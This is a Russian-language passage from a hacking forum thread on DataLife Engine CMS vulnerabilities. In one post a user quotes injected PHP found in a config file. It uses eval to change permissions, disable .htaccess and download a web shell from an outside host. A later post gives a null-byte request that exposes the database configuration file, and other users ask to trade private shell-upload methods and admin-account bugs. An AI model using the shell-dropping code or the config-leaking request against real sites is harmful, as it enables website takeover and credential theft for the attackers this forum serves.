HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 26.02.2014, 08:13
mironich
Постоянный
Регистрация: 27.02.2011
Сообщений: 733
С нами: 8003126

Репутация: 19


По умолчанию

Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.
 
Ответить с цитированием

  #342  
Старый 26.02.2014, 13:11
VY_CMa
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами: 7552406

Репутация: 724


По умолчанию

Цитата:
Сообщение от Donnel  
А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом?
Да. Всё, что ты выкачал не является php исходниками.

А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.

http://ru.wikipedia.org/wiki/PHP

http://habrahabr.ru/post/143331/
 
Ответить с цитированием

  #343  
Старый 27.02.2014, 20:55
Donnel
Новичок
Регистрация: 20.02.2014
Сообщений: 5
С нами: 6434966

Репутация: 0
По умолчанию

Цитата:
Сообщение от VY_CMa  
Да. Всё, что ты выкачал не является php исходниками.
А теперь пара ссылок, чтобы не выглядел в следующий раз так-же.
http://ru.wikipedia.org/wiki/PHP
http://habrahabr.ru/post/143331/
Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?
 
Ответить с цитированием

  #344  
Старый 27.02.2014, 21:10
hpol
Познающий
Регистрация: 11.12.2013
Сообщений: 62
С нами: 6537206

Репутация: 15
По умолчанию

вот недавно нашел в config.php , как юзают ..хз

Код:
.eval(base64_decode(chmod("engine/modules/", 0777);  chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");  chmod("engine/modules/avatar.class.php", 0404);)),//
 
Ответить с цитированием

  #345  
Старый 03.03.2014, 13:31
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
С нами: 8670841

Репутация: -4
По умолчанию

Цитата:
Сообщение от hpol  
вот недавно нашел в config.php , как юзают ..хз
Код:
.eval(base64_decode(chmod("engine/modules/", 0777);  chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");  chmod("engine/modules/avatar.class.php", 0404);)),//
Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки...

Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.
 
Ответить с цитированием

  #346  
Старый 18.03.2014, 17:21
ramauf
Новичок
Регистрация: 14.03.2014
Сообщений: 0
С нами: 6403286

Репутация: 0
По умолчанию

ахаха ты вы че ламеры вот же

copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php");

тут походу шелл лежал, подозреваю, что s = shell
 
Ответить с цитированием

  #347  
Старый 21.03.2014, 14:42
RexelNet
Новичок
Регистрация: 21.10.2010
Сообщений: 21
С нами: 8188886

Репутация: -5
По умолчанию

ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...


вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..
 
Ответить с цитированием

  #348  
Старый 21.03.2014, 17:43
hpol
Познающий
Регистрация: 11.12.2013
Сообщений: 62
С нами: 6537206

Репутация: 15
По умолчанию

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
 
Ответить с цитированием

  #349  
Старый 22.03.2014, 03:02
Тр⚡️ха
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 178
С нами: 9731846

Репутация: 622
По умолчанию

Цитата:
Сообщение от RexelNet  
ramauf , ты дaлбaёб?

вопрос был изначально не что это ТАМ, а как удалось этот код пропихнуть умник бля...

вопрос актуален, некто не вкурсе как удалось пропихнуть туда этот код ?

если есть приват способы по загрузке шелла/выполнению кода ,либо иные баги по получению админского аккаунта, готов принять в дар, либо обменять на шелл,либо иные варианты..

в версиях ниже 9.7 можно пропихнуть
 
Ответить с цитированием

  #350  
Старый 26.03.2014, 14:49
Donnel
Новичок
Регистрация: 20.02.2014
Сообщений: 5
С нами: 6434966

Репутация: 0
По умолчанию

Цитата:
Сообщение от hpol  
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
вот эту тему встречал на нескольких десятых версиях , выдаёт данные от myadmin
Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.